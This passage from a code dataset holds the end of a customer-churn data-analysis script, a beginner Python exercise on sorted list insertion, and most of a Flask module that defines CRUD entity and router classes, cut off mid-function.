Matrix\r\nsns.set(style=\"white\")\r\ncorr = dataset.drop(columns = ['user', 'churn','housing','payment_type','zodiac_sign']).corr()\r\nmask = np.zeros_like(corr, dtype=bool)\r\nmask[np.triu_indices_from(mask)] = True\r\nf, ax = plt.subplots(figsize=(18, 15))\r\ncmap = sns.diverging_palette(220, 10, as_cmap=True)\r\nsns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0,\r\n            square=True, linewidths=.5, cbar_kws={\"shrink\": .5})\r\nplt.suptitle(\"Correlation Matrix\",fontsize=20)\r\nplt.show()\r\n\r\ndataset = dataset.drop(columns = ['app_web_user'])\r\n# dataset = dataset.drop(columns = ['housing','payment_type','zodiac_sign'])\r\n# Note: Although there are somewhat correlated fields, they are not collinear\r\n# These features are not functions of each other, so they won't break the model\r\n# But these features won't help much either. 
Feature Selection should remove them.\r\n\r\ndataset.to_csv('new_churn_data.csv', index = False)\r\n\r\n","repo_name":"HimalayPatel/minimizing-churn-rate","sub_path":"minimizing_churn_eda.py","file_name":"minimizing_churn_eda.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"12842795174","text":"\"\"\"\nChallenge 080\n\nProblem: Create a program where the user enters 5 numeric values and registers them\n           in a list, already at the correct insertion position (without using sort()).\n           At the end, show the list.\n\"\"\"\n\nvalues = []\n\nfor x in range(0, 5):\n    num = int(input('Insira um número:'))\n\n    while num in values:\n        print('-=-' * 15)\n        print('Valor duplicado. Tente novamente...')\n        num = int(input('Insira um número:'))\n    print()\n\n    if x == 0 or num > values[-1]:\n        values.append(num)\n        print('Valor adicionado no final da lista')\n    else:\n        pos = 0\n        while pos < len(values):\n            if num <= values[pos]:\n                values.insert(pos, num)\n                print(f'Valor adicionado na {pos}° posição')\n                break\n\n            pos += 1\n    print()\n\nprint('-=-' * 15)\nprint(f'Voce inseriu os valores: {values}')\nprint('-=-' * 15)","repo_name":"Mich4elDoug/Python3_Curso","sub_path":"Mundo_3 - Estrutras_Compostas/Aula17 - (Listas)/ex080.py","file_name":"ex080.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16011034011","text":"from flask import Response\nimport json\nfrom schemalite.core import json_encoder\n\nfrom .crud_constructors import (\n    construct_get_view_function,\n    construct_index_view_function, construct_post_view_function,\n    construct_put_view_function, construct_delete_view_function,\n    construct_patch_view_function, construct_batch_save_view_function)\nfrom . import entity_definition_keys as edk\nfrom toolspy import (\n    all_subclasses, fetch_nested_key_from_dict, fetch_nested_key,\n    delete_dict_keys, union, merge, difference, transform_dict)\nfrom copy import deepcopy\n\n\nclass EntityOperation(object):\n    \"\"\"\n    Base class which represents a CRUD operation on the entity\n    \"\"\"\n    def __init__(self, entity=None):\n        self.init_entity(entity)\n\n    def init_entity(self, entity=None):\n        self.entity = entity\n\n    def to_dict(self):\n        raise NotImplementedError\n\n\n\nclass Get(EntityOperation):\n    \"\"\"This class represents a GET operation on an entity.\n    Registers a GET endpoint at /<url_slug>/<_id>\n\n    Parameters\n    ------------\n    entity: Entity\n        The entity object on which the Get operation is defined. Should be specified if the get\n        operation is defined separately after the entity is defined. Can be skipped if it is instead\n        defined as a part of the entity definition\n\n    query_modifier: function, Optional\n        A function which can modify the query used to fetch the object to be returned. By default\n        the router obtains the instance to be fetched by Get by filtering the id attribute\n        to be equal to the value of the id in the url.\n        If we want to set some more filters before fetching, this\n        should be a function which accepts a query and returns a query.\n        For example, if an api is supposed to return only confirmed orders, we can set the\n        query_modifier like this\n        \n        query_modifier = lambda q: q.filter(Order.confirmed==True)\n\n        This will take precedence over the query_modifier defined at entity level\n\n    permitted_object_getter: function, optional\n        A function which, if set, will be used to retrieve the object to get. 
If this\n        callable is set, then this will be used instead of the query used to get\n        the object by default.\n        For example if you want to get the current user always when registering the user\n        model in an api, you can set it like this\n\n        >>> Get(permitted_object_getter=lambda: current_user)\n\n        This will take precedence over the permitted_object_getter defined at entity level\n\n    id_attr: str, optional\n        By default the primary key is used as the id attribute. But we can modify it to some\n        other field. For example if we want the url to be like /users/abcd@xyz.com, then we can\n        set\n\n        >>> Get(id_attr='email')\n\n    response_dict_struct: dict, optional\n        The dictionary used to specify the structure of the object\n\n        Example:\n\n        Get(\n            response_dict_struct=dict(\n                attrs=[\"id\", \"name\", \"description\"],\n                rels={\n                    \"tasks\": dict(\n                        attrs=[\"id\", \"title\"],\n                        rels={\n                            \"assignees\": dict(attrs=[\"name\", \"email\"])\n                        }\n                    ),\n                    \"projects\": {}\n                }\n            )\n        )\n\n    response_dict_modifiers: List[Callable[[dict, model instance], dict]], Optional\n        A list of functions, where each function should be able to accept the response\n        dictionary as the first argument and the instance which is being fetched \n        as the second argument, and then make any modifications as required to the\n        response dict and return it\n\n        \n    url: str\n        Optional. Provide this if you want to override the default url for the Get\n        operation which is of the format /<url_slug>/<_id>. For example if you\n        want to define a special endpoint /accounts/current which will let the client\n        access the currently logged in account without knowing the id, then you would need\n        to set this url parameter\n\n        \n    \"\"\"\n\n\n    method = 'get'\n\n    def __init__(\n            self, entity=None, view_function=None, query_modifier=None,\n            permitted_object_getter=None, id_attr=None, response_dict_struct=None,\n            response_dict_modifiers=None, exception_handler=None, access_checker=None,\n            url=None, enable_caching=False, cache_key_determiner=None,\n            cache_timeout=None):\n        super(Get, self).__init__(entity=entity)\n        self.url = url\n        self.enable_caching = enable_caching\n        self.cache_key_determiner = cache_key_determiner\n        self.cache_timeout = cache_timeout\n        self.view_function = view_function\n        self.query_modifier = query_modifier\n        self.permitted_object_getter = permitted_object_getter\n        self.id_attr = id_attr\n        self.response_dict_struct = response_dict_struct\n        self.response_dict_modifiers = response_dict_modifiers\n        self.exception_handler = exception_handler\n        self.access_checker = access_checker\n\n    def to_dict(self):\n        return transform_dict({\n            edk.URL: self.url,\n            edk.ENABLE_CACHING: self.enable_caching,\n            edk.CACHE_KEY_DETERMINER: self.cache_key_determiner,\n            edk.CACHE_TIMEOUT: self.cache_timeout,\n            edk.VIEW_FUNC: self.view_function,\n            edk.QUERY_MODIFIER: self.query_modifier,\n            edk.PERMITTED_OBJECT_GETTER: self.permitted_object_getter,\n            edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n            edk.RESPONSE_DICT_MODIFIERS: self.response_dict_modifiers,\n            edk.EXCEPTION_HANDLER: self.exception_handler,\n            edk.ACCESS_CHECKER: self.access_checker,\n        }, skip_none_vals=True)\n\n\nclass Index(EntityOperation):\n\n    method = 'index'\n\n    def __init__(\n            self, entity=None, url=None, view_function=None, enable_caching=None,\n            cache_key_determiner=None, cache_timeout=None, query_modifier=None,\n            response_dict_struct=None, custom_response_creator=None,\n            exception_handler=None, access_checker=None,\n            default_limit=None, default_sort=None, default_orderby=None,\n            default_offset=None, default_page=None, 
default_per_page=None):\n super(Index, self).__init__(entity=entity)\n self.url = url\n self.view_function = view_function\n self.enable_caching = enable_caching\n self.cache_key_determiner = cache_key_determiner\n self.cache_timeout = cache_timeout\n self.query_modifier = query_modifier\n self.response_dict_struct = response_dict_struct\n self.custom_response_creator = custom_response_creator\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n self.default_limit = default_limit\n self.default_sort = default_sort\n self.default_orderby = default_orderby\n self.default_offset = default_offset\n self.default_page = default_page\n self.default_per_page = default_per_page\n\n def to_dict(self):\n return transform_dict({\n edk.URL: self.url,\n edk.VIEW_FUNC: self.view_function,\n edk.ENABLE_CACHING: self.enable_caching,\n edk.CACHE_KEY_DETERMINER: self.cache_key_determiner,\n edk.CACHE_TIMEOUT: self.cache_timeout,\n edk.QUERY_MODIFIER: self.query_modifier,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.CUSTOM_RESPONSE_CREATOR: self.custom_response_creator,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.ACCESS_CHECKER: self.access_checker,\n edk.DEFAULT_LIMIT: self.default_limit,\n edk.DEFAULT_SORT: self.default_sort,\n edk.DEFAULT_ORDERBY: self.default_orderby,\n edk.DEFAULT_OFFSET: self.default_offset,\n edk.DEFAULT_PAGE: self.default_page,\n edk.DEFAULT_PER_PAGE: self.default_per_page\n }, skip_none_vals=True)\n\n\nclass Post(EntityOperation):\n\n method = 'post'\n\n def __init__(\n self, entity=None, url=None, view_function=None, before_save=None, after_save=None,\n response_dict_struct=None, exception_handler=None, access_checker=None,\n settable_fields=None, non_settable_fields=None,\n remove_property_keys_before_validation=False, remove_relationship_keys_before_validation=False,\n remove_assoc_proxy_keys_before_validation=False, input_schema_modifier=None):\n super(Post, self).__init__(entity=entity)\n self.url = url\n self.view_function = view_function\n self.before_save = before_save\n self.after_save = after_save\n self.response_dict_struct = response_dict_struct\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n self.settable_fields = settable_fields\n self.non_settable_fields = non_settable_fields\n self.remove_property_keys_before_validation = remove_property_keys_before_validation\n self.remove_relationship_keys_before_validation = remove_relationship_keys_before_validation\n self.remove_assoc_proxy_keys_before_validation = remove_assoc_proxy_keys_before_validation\n self.input_schema_modifier = input_schema_modifier\n\n\n def to_dict(self):\n return transform_dict({\n edk.URL: self.url,\n edk.VIEW_FUNC: self.view_function,\n edk.BEFORE_SAVE_HANDLERS: self.before_save,\n edk.AFTER_SAVE_HANDLERS: self.after_save,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.ACCESS_CHECKER: self.access_checker,\n edk.SETTABLE_FIELDS: self.settable_fields,\n edk.NON_SETTABLE_FIELDS: self.non_settable_fields,\n edk.REMOVE_PROPERTY_KEYS_BEFORE_VALIDATION: self.remove_property_keys_before_validation,\n edk.REMOVE_RELATIONSHIP_KEYS_BEFORE_VALIDATION: self.remove_relationship_keys_before_validation,\n edk.REMOVE_ASSOC_PROXY_KEYS_BEFORE_VALIDATION: self.remove_assoc_proxy_keys_before_validation,\n edk.INPUT_SCHEMA_MODIFIER: self.input_schema_modifier\n }, skip_none_vals=True)\n\nclass Put(EntityOperation):\n\n method = 'put'\n\n def __init__(\n self, 
entity=None, url=None, view_function=None,\n query_modifier=None,\n permitted_object_getter=None,\n before_save=None, after_save=None,\n response_dict_struct=None, exception_handler=None, access_checker=None,\n settable_fields=None, non_settable_fields=None,\n remove_property_keys_before_validation=False, remove_relationship_keys_before_validation=False,\n remove_assoc_proxy_keys_before_validation=False, input_schema_modifier=None):\n super(Put, self).__init__(entity=entity)\n self.url = url\n self.view_function = view_function\n self.query_modifier = query_modifier\n self.permitted_object_getter = permitted_object_getter\n self.before_save = before_save\n self.after_save = after_save\n self.response_dict_struct = response_dict_struct\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n self.settable_fields = settable_fields\n self.non_settable_fields = non_settable_fields\n self.remove_property_keys_before_validation = remove_property_keys_before_validation\n self.remove_relationship_keys_before_validation = remove_relationship_keys_before_validation\n self.remove_assoc_proxy_keys_before_validation = remove_assoc_proxy_keys_before_validation\n self.input_schema_modifier = input_schema_modifier\n\n\n def to_dict(self):\n return transform_dict({\n edk.URL: self.url,\n edk.VIEW_FUNC: self.view_function,\n edk.QUERY_MODIFIER: self.query_modifier,\n edk.PERMITTED_OBJECT_GETTER: self.permitted_object_getter,\n edk.BEFORE_SAVE_HANDLERS: self.before_save,\n edk.AFTER_SAVE_HANDLERS: self.after_save,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.ACCESS_CHECKER: self.access_checker,\n edk.SETTABLE_FIELDS: self.settable_fields,\n edk.NON_SETTABLE_FIELDS: self.non_settable_fields,\n edk.REMOVE_PROPERTY_KEYS_BEFORE_VALIDATION: self.remove_property_keys_before_validation,\n edk.REMOVE_RELATIONSHIP_KEYS_BEFORE_VALIDATION: self.remove_relationship_keys_before_validation,\n edk.REMOVE_ASSOC_PROXY_KEYS_BEFORE_VALIDATION: self.remove_assoc_proxy_keys_before_validation,\n edk.INPUT_SCHEMA_MODIFIER: self.input_schema_modifier\n }, skip_none_vals=True)\n\n\nclass Patch(EntityOperation):\n\n method = 'patch'\n\n def __init__(\n self, entity=None, url=None, view_function=None, query_modifier=None,\n commands=None, permitted_object_getter=None,\n before_save=None, after_save=None,\n response_dict_struct=None, exception_handler=None, access_checker=None,\n settable_fields=None, non_settable_fields=None,\n remove_property_keys_before_validation=False, remove_relationship_keys_before_validation=False,\n remove_assoc_proxy_keys_before_validation=False, input_schema_modifier=None):\n super(Patch, self).__init__(entity=entity)\n self.url = url\n self.view_function = view_function\n self.query_modifier = query_modifier\n self.permitted_object_getter = permitted_object_getter\n self.commands = commands\n self.before_save = before_save\n self.after_save = after_save\n self.response_dict_struct = response_dict_struct\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n self.settable_fields = settable_fields\n self.non_settable_fields = non_settable_fields\n self.remove_property_keys_before_validation = remove_property_keys_before_validation\n self.remove_relationship_keys_before_validation = remove_relationship_keys_before_validation\n self.remove_assoc_proxy_keys_before_validation = remove_assoc_proxy_keys_before_validation\n self.input_schema_modifier = input_schema_modifier\n\n\n def 
to_dict(self):\n return transform_dict({\n edk.URL: self.url,\n edk.VIEW_FUNC: self.view_function,\n edk.QUERY_MODIFIER: self.query_modifier,\n edk.BEFORE_SAVE_HANDLERS: self.before_save,\n edk.AFTER_SAVE_HANDLERS: self.after_save,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.ACCESS_CHECKER: self.access_checker,\n edk.SETTABLE_FIELDS: self.settable_fields,\n edk.NON_SETTABLE_FIELDS: self.non_settable_fields,\n edk.REMOVE_PROPERTY_KEYS_BEFORE_VALIDATION: self.remove_property_keys_before_validation,\n edk.REMOVE_RELATIONSHIP_KEYS_BEFORE_VALIDATION: self.remove_relationship_keys_before_validation,\n edk.REMOVE_ASSOC_PROXY_KEYS_BEFORE_VALIDATION: self.remove_assoc_proxy_keys_before_validation,\n edk.INPUT_SCHEMA_MODIFIER: self.input_schema_modifier\n }, skip_none_vals=True)\n\nclass Delete(EntityOperation):\n\n method = 'delete'\n\n def __init__(\n self, entity=None, url=None, view_function=None, query_modifier=None,\n permitted_object_getter=None,\n before_save=None, after_save=None,\n response_dict_struct=None, exception_handler=None, access_checker=None,\n settable_fields=None, non_settable_fields=None,\n remove_property_keys_before_validation=False, remove_relationship_keys_before_validation=False,\n remove_assoc_proxy_keys_before_validation=False, input_schema_modifier=None):\n super(Delete, self).__init__(entity=entity)\n self.url = url\n self.view_function = view_function\n self.query_modifier = query_modifier\n self.permitted_object_getter = permitted_object_getter\n self.before_save = before_save\n self.after_save = after_save\n self.response_dict_struct = response_dict_struct\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n self.settable_fields = settable_fields\n self.non_settable_fields = non_settable_fields\n self.remove_property_keys_before_validation = remove_property_keys_before_validation\n self.remove_relationship_keys_before_validation = remove_relationship_keys_before_validation\n self.remove_assoc_proxy_keys_before_validation = remove_assoc_proxy_keys_before_validation\n self.input_schema_modifier = input_schema_modifier\n\n\n def to_dict(self):\n return transform_dict({\n edk.URL: self.url,\n edk.VIEW_FUNC: self.view_function,\n edk.QUERY_MODIFIER: self.query_modifier,\n edk.PERMITTED_OBJECT_GETTER: self.permitted_object_getter,\n edk.BEFORE_SAVE_HANDLERS: self.before_save,\n edk.AFTER_SAVE_HANDLERS: self.after_save,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.ACCESS_CHECKER: self.access_checker,\n edk.SETTABLE_FIELDS: self.settable_fields,\n edk.NON_SETTABLE_FIELDS: self.non_settable_fields,\n edk.REMOVE_PROPERTY_KEYS_BEFORE_VALIDATION: self.remove_property_keys_before_validation,\n edk.REMOVE_RELATIONSHIP_KEYS_BEFORE_VALIDATION: self.remove_relationship_keys_before_validation,\n edk.REMOVE_ASSOC_PROXY_KEYS_BEFORE_VALIDATION: self.remove_assoc_proxy_keys_before_validation,\n edk.INPUT_SCHEMA_MODIFIER: self.input_schema_modifier\n }, skip_none_vals=True)\n\nclass BatchSave(EntityOperation):\n\n method = 'batch_save'\n\n def __init__(\n self, entity=None, url=None, view_function=None, query_modifier=None,\n permitted_object_getter=None, unique_identifier_fields=None, \n before_save=None, after_save=None,\n extra_actions_before_save=None, extra_actions_after_save=None,\n result_saving_instance_model=None,\n result_saving_instance_getter=None,\n run_as_async_task=False, celery_worker=None,\n 
response_dict_struct=None, exception_handler=None, access_checker=None,\n settable_fields=None, non_settable_fields=None,\n remove_property_keys_before_validation=False, remove_relationship_keys_before_validation=False,\n remove_assoc_proxy_keys_before_validation=False, input_schema_modifier=None,\n update_only=False, create_only=False,\n skip_pre_processors=False, skip_post_processors=False):\n super(BatchSave, self).__init__(entity=entity)\n self.url = url\n self.view_function = view_function\n self.query_modifier = query_modifier\n self.permitted_object_getter = permitted_object_getter\n self.unique_identifier_fields = unique_identifier_fields\n self.result_saving_instance_model = result_saving_instance_model\n self.result_saving_instance_getter = result_saving_instance_getter\n self.run_as_async_task = run_as_async_task\n self.celery_worker = celery_worker\n self.update_only = update_only\n self.create_only = create_only\n self.skip_pre_processors = skip_pre_processors\n self.skip_post_processors = skip_post_processors\n self.before_save = before_save\n self.after_save = after_save\n self.extra_actions_before_save = extra_actions_before_save\n self.extra_actions_after_save = extra_actions_after_save\n self.response_dict_struct = response_dict_struct\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n self.settable_fields = settable_fields\n self.non_settable_fields = non_settable_fields\n self.remove_property_keys_before_validation = remove_property_keys_before_validation\n self.remove_relationship_keys_before_validation = remove_relationship_keys_before_validation\n self.remove_assoc_proxy_keys_before_validation = remove_assoc_proxy_keys_before_validation\n self.input_schema_modifier = input_schema_modifier\n\n\nclass Entity(object):\n\n \"\"\"This class represents a resource on which all the CRUD operations are defined.\n Think of it as a wrapper around the model. The same model can be exposed as different\n entities in different parts of the application\n\n Parameters\n ------------\n url_slug: str, Optional\n The common url slug which will be used to define the various CRUD endpoints\n defined on the entity. For example for an entity named Order, you can define\n the url_slug as orders\n\n model_class: class:flask_sqlalchemy.model.DefaultMeta\n The model for which the entity is being defined. This should be a Model class\n defined with FlaskSQLAlchemyBooster's model meta class as the base.\n\n name: str, optional\n An optional name for the entity. If it is not specified, the model name will be used\n as the name\n \n router: class:EntityRouter\n The router to which the entity is to be linked. 
To be specified if the entity is\n defined separately\n\n \n \"\"\"\n\n def __init__(\n self, url_slug=None, model_class=None, name=None, router=None,\n permitted_operations=None, permitted_object_getter=None,\n forbidden_operations=None, endpoint_slug=None, input_schema_modifier=None,\n query_modifier=None, access_checker=None, exception_handler=None, response_dict_modifiers=None,\n id_attr=None, response_dict_struct=None, non_settable_fields=None, settable_fields=None,\n remove_relationship_keys_before_validation=False, remove_assoc_proxy_keys_before_validation=False,\n remove_property_keys_before_validation=False, enable_caching=False, cache_timeout=None,\n get=None, index=None, put=None, post=None, patch=None, delete=None, batch_save=None):\n self.model_class = model_class\n self.name = name or self.model_class.__name__\n self.router = router\n if self.router:\n if self not in self.router.routes:\n self.router.routes[self.url_slug] = self\n self.url_slug = url_slug\n self.permitted_object_getter = permitted_object_getter\n self.permitted_operations = permitted_operations\n self.forbidden_operations = forbidden_operations\n self.endpoint_slug = endpoint_slug\n self.input_schema_modifier = input_schema_modifier\n self.query_modifier = query_modifier\n self.access_checker = access_checker\n self.exception_handler = exception_handler\n self.response_dict_modifiers = response_dict_modifiers\n self.response_dict_struct = response_dict_struct\n self.id_attr = id_attr\n self.non_settable_fields = non_settable_fields if non_settable_fields else []\n self.settable_fields = settable_fields if settable_fields else []\n self.enable_caching = enable_caching\n self.cache_timeout = cache_timeout\n self.remove_relationship_keys_before_validation = remove_relationship_keys_before_validation\n self.remove_assoc_proxy_keys_before_validation = remove_assoc_proxy_keys_before_validation\n self.remove_property_keys_before_validation = remove_property_keys_before_validation\n\n self.get = get\n if self.get and self.get.entity is None:\n self.get.init_entity(self)\n\n self.index = index\n if self.index and self.index.entity is None:\n self.index.init_entity(self)\n\n self.post = post\n if self.post and self.post.entity is None:\n self.post.init_entity(self)\n\n self.put = put\n if self.put and self.put.entity is None:\n self.put.init_entity(self)\n\n self.delete = delete\n if self.delete and self.delete.entity is None:\n self.delete.init_entity(self)\n\n self.patch = patch\n if self.patch and self.patch.entity is None:\n self.patch.init_entity(self)\n\n self.batch_save = batch_save\n if self.batch_save and self.batch_save.entity is None:\n self.batch_save.init_entity(self)\n \n\n def to_dict(self):\n return transform_dict({\n edk.URL_SLUG: self.url_slug,\n edk.PERMITTED_OPERATIONS: self.permitted_operations,\n edk.FORBIDDEN_OPERATIONS: self.forbidden_operations,\n edk.ENDPOINT_SLUG: self.endpoint_slug,\n edk.QUERY_MODIFIER: self.query_modifier,\n edk.ACCESS_CHECKER: self.access_checker,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.RESPONSE_DICT_MODIFIERS: self.response_dict_modifiers,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.ID_ATTR: self.id_attr,\n edk.NON_SETTABLE_FIELDS: self.non_settable_fields,\n edk.SETTABLE_FIELDS: self.settable_fields,\n edk.ENABLE_CACHING: self.enable_caching,\n edk.CACHE_TIMEOUT: self.cache_timeout,\n edk.REMOVE_RELATIONSHIP_KEYS_BEFORE_VALIDATION: self.remove_relationship_keys_before_validation,\n edk.REMOVE_ASSOC_PROXY_KEYS_BEFORE_VALIDATION: 
self.remove_assoc_proxy_keys_before_validation,\n edk.REMOVE_PROPERTY_KEYS_BEFORE_VALIDATION: self.remove_property_keys_before_validation\n }, skip_none_vals=True)\n\n\n\nclass EntitiesRouter(object):\n\n \"\"\"\n Contains a collection of entities mapped to url routes. The router\n can be mounted on an app or a blueprint.\n\n Parameters\n -----------\n\n mount_point: Flask app or blueprint\n The app or blueprint on which the router is to be mounted. If this\n parameter is specified, the router will be mounted immediately. Or\n you can leave this unspecified and later call `router.mount_on(app_or_bp)`\n\n routes: dict\n A dictionary of url slugs mapped to entities like this\n {\n \"orders\": Entity(model_class=Order, index=Index(), get=Get(), post=Post(), put=Put()),\n \"users\": Entity(model_class=User, index=Index())\n }\n\n cache_handler: `class:FlaskCaching`\n A cache instance. Currently supports only FlaskCaching\n\n exception_handler: function, optional\n A function which accepts an exception and returns a json response\n\n Example:\n\n >>> def log_exception_and_return_json(e):\n >>> return error_json(400, e.message)\n\n celery_worker: Celery, optional\n A celery worker which will be used to run the async batch save operation.\n\n register_schema_definition: bool, optional\n A bool flag which specifies whether the schema definition json needs to be registered.\n\n schema_def_url: str, Optional\n The url slug to be used to register the schema definition\n\n register_views_map: bool, optional\n A bool flag which specifies whether the views map json needs to be registered.\n\n views_map_url: str, Optional\n The url slug to be used to register the views map\n\n \"\"\"\n\n def __init__(self,\n mount_point=None, routes=None, allow_unknown_fields=False, \n cache_handler=None, exception_handler=None,\n tmp_folder_path=\"/tmp\", permitted_operations=None,\n forbidden_operations=None, celery_worker=None,\n register_schema_definition=True, register_views_map=True,\n schema_def_url='/schema-def', views_map_url='/views-map',\n base_url=None\n ):\n\n self.schema_definition = {\n \"models_registered_for_views\": [],\n \"model_schemas\": {\n\n },\n \"views\": {\n\n }\n }\n self.routes = routes or {}\n for url_slug, entity in self.routes.items():\n if entity.url_slug is None:\n entity.url_slug = url_slug\n if entity.router is None:\n entity.router = self\n self.allow_unknown_fields = allow_unknown_fields\n self.cache_handler = cache_handler\n self.exception_handler = exception_handler\n self.tmp_folder_path = tmp_folder_path\n self.permitted_operations = permitted_operations\n self.forbidden_operations = forbidden_operations\n self.celery_worker = celery_worker\n self.register_schema_definition = register_schema_definition\n self.register_views_map = register_views_map\n self.schema_def_url = schema_def_url\n self.views_map_url = views_map_url\n # self.registry = {}\n self.initialize_registry_entry()\n if mount_point:\n self.mount_point = mount_point\n self.mount_on(self.mount_point)\n\n def route(self, url_slug, entity):\n self.routes[url_slug] = entity\n if entity.url_slug is None:\n entity.url_slug = url_slug\n if entity.router is None:\n entity.router = self\n\n\n def get_registry_entry(self):\n return self.registry\n\n def initialize_registry_entry(self):\n self.registry = {\n \"models_registered_for_views\": [],\n \"model_schemas\": {\n\n },\n edk.OPERATION_MODIFIERS: {\n\n }\n }\n def mount_on(\n self, app_or_bp, allow_unknown_fields=False, cache_handler=None,\n exception_handler=None,\n 
tmp_folder_path=None, celery_worker=None,\n register_schema_definition=None, register_views_map=None,\n schema_def_url=None, views_map_url=None):\n self.mount_point = app_or_bp\n if allow_unknown_fields is None:\n allow_unknown_fields = self.allow_unknown_fields\n if register_schema_definition is None:\n register_schema_definition = self.register_schema_definition\n if register_views_map is None:\n register_views_map = self.register_views_map\n self.register_crud_routes(\n allow_unknown_fields=allow_unknown_fields,\n cache_handler=cache_handler or self.cache_handler, \n exception_handler=exception_handler or self.exception_handler,\n tmp_folder_path=tmp_folder_path or self.tmp_folder_path,\n celery_worker=celery_worker or self.celery_worker,\n register_schema_definition=register_schema_definition,\n register_views_map=register_views_map,\n schema_def_url=schema_def_url or self.schema_def_url,\n views_map_url=views_map_url or self.views_map_url\n )\n\n\n def to_dict(self):\n entities_map = {}\n for url_slug, entity in self.routes.items():\n entities_map[entity.name or entity.model_class] = entity.to_dict()\n return entities_map\n\n\n def register_crud_routes(\n self, allow_unknown_fields=False, cache_handler=None,\n exception_handler=None,\n tmp_folder_path=\"/tmp\", celery_worker=None,\n register_schema_definition=True, register_views_map=True,\n schema_def_url='/schema-def', views_map_url='/views-map'):\n\n app_or_bp = self.mount_point\n registry = self.get_registry_entry()\n model_schemas = registry[\"model_schemas\"]\n\n def populate_model_schema(model_class, entity=None):\n model_key = fetch_nested_key(entity, 'name') or model_class.__name__\n if model_class._input_data_schema_:\n input_schema = deepcopy(model_class._input_data_schema_)\n else:\n input_schema = model_class.generate_input_data_schema()\n if entity and callable(entity.input_schema_modifier):\n input_schema = entity.input_schema_modifier(\n input_schema)\n model_schemas[model_key] = {\n \"input_schema\": input_schema,\n \"output_schema\": model_class.output_data_schema(),\n \"accepted_data_structure\": model_class.max_permissible_dict_structure()\n }\n for subcls in all_subclasses(model_class):\n if subcls.__name__ not in model_schemas:\n model_schemas[subcls.__name__] = {\n 'is_a_polymorphically_derived_from': model_class.__name__,\n 'polymorphic_identity': subcls.__mapper_args__['polymorphic_identity']\n }\n for rel in model_class.__mapper__.relationships.values():\n if rel.mapper.class_.__name__ not in model_schemas:\n populate_model_schema(rel.mapper.class_)\n\n for url_slug, entity in self.routes.items():\n _model = entity.model_class\n _model_name = entity.name\n base_url = url_slug\n # base_url = _model_dict.get(edk.URL_SLUG)\n\n default_query_constructor = entity.query_modifier\n default_access_checker = entity.access_checker\n default_exception_handler = entity.exception_handler or exception_handler\n default_dict_post_processors = entity.response_dict_modifiers\n default_id_attr = entity.id_attr\n dict_struct_for_model = entity.response_dict_struct\n fields_forbidden_from_being_set_for_all_views = entity.non_settable_fields or []\n fields_allowed_to_be_set_for_all_views = entity.settable_fields or []\n remove_relationship_keys_before_validation = entity.remove_relationship_keys_before_validation\n remove_assoc_proxy_keys_before_validation = entity.remove_assoc_proxy_keys_before_validation\n remove_property_keys_before_validation = entity.remove_property_keys_before_validation\n enable_caching = 
entity.enable_caching and cache_handler is not None\n cache_timeout = entity.cache_timeout\n endpoint_slug = entity.endpoint_slug or _model.__tablename__\n\n if _model_name not in registry[\"models_registered_for_views\"]:\n registry[\"models_registered_for_views\"].append(\n _model_name)\n if _model_name not in model_schemas:\n populate_model_schema(entity.model_class, entity)\n\n if _model._input_data_schema_:\n model_default_input_schema = deepcopy(_model._input_data_schema_)\n else:\n model_default_input_schema = _model.generate_input_data_schema()\n if callable(entity.input_schema_modifier):\n model_default_input_schema = entity.input_schema_modifier(\n model_default_input_schema)\n\n views = registry[edk.OPERATION_MODIFIERS]\n schemas_registry = {k: v.get('input_schema')\n for k, v in list(model_schemas.items())}\n if _model_name not in views:\n views[_model_name] = {}\n\n if entity.index:\n index_op = entity.index\n if index_op.enable_caching is not None:\n enable_caching = index_op.enable_caching and cache_handler is not None\n cache_key_determiner = index_op.cache_key_determiner\n cache_timeout = index_op.cache_timeout or cache_timeout\n index_func = index_op.view_function or construct_index_view_function(\n _model,\n index_query_creator=index_op.query_modifier or default_query_constructor,\n dict_struct=index_op.response_dict_struct or dict_struct_for_model,\n custom_response_creator=index_op.custom_response_creator,\n enable_caching=enable_caching,\n cache_handler=cache_handler,\n cache_key_determiner=cache_key_determiner,\n cache_timeout=cache_timeout,\n exception_handler=index_op.exception_handler or default_exception_handler,\n access_checker=index_op.access_checker or default_access_checker,\n default_limit=index_op.default_limit,\n default_sort=index_op.default_sort,\n default_orderby=index_op.default_orderby,\n default_offset=index_op.default_offset,\n default_page=index_op.default_page,\n default_per_page=index_op.default_per_page\n )\n index_url = index_op.url or \"/%s\" % base_url\n app_or_bp.route(\n index_url, methods=['GET'], endpoint='index_%s' % endpoint_slug)(\n index_func)\n views[_model_name][edk.INDEX] = {edk.URL: index_url}\n\n if entity.get:\n get_op = entity.get\n if get_op.enable_caching is not None:\n enable_caching = get_op.enable_caching and cache_handler is not None\n cache_key_determiner = get_op.cache_key_determiner\n cache_timeout = get_op.cache_timeout or cache_timeout\n get_func = get_op.view_function or construct_get_view_function(\n _model,\n permitted_object_getter=get_op.permitted_object_getter or entity.permitted_object_getter,\n get_query_creator=get_op.query_modifier or default_query_constructor,\n dict_struct=get_op.response_dict_struct or dict_struct_for_model,\n enable_caching=enable_caching,\n cache_handler=cache_handler, cache_key_determiner=cache_key_determiner,\n 